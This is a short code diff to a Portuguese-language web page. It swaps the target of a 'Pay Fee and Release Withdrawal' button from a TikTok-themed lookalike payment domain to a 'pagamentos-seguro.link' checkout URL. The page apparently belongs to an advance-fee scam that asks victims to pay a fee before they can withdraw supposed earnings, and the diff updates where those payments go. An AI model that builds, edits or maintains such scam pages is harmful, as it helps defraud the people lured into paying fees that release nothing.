--- a/3.html/index.html
+++ b/3.html/index.html
@@ -1378,7 +1378,7 @@
 
                 <!-- Call to Action -->
                 <div class="confirmation-section">
-                    <a href="https://pay.tiktokpayreview.online/69572c53ede5279f00b3bedd"
+                    <a href="https://www.pagamentos-seguro.link/checkout/d860f8ef-b1f2-4883-867d-fc66b78c10ad"
                         class="confirmation-cta-button" id="confirmation-button">
                         Pagar Taxa e Liberar Saque
                     </a>
@@ -1626,5 +1626,6 @@
     </footer>
 
 </body>
+
 
 </html>
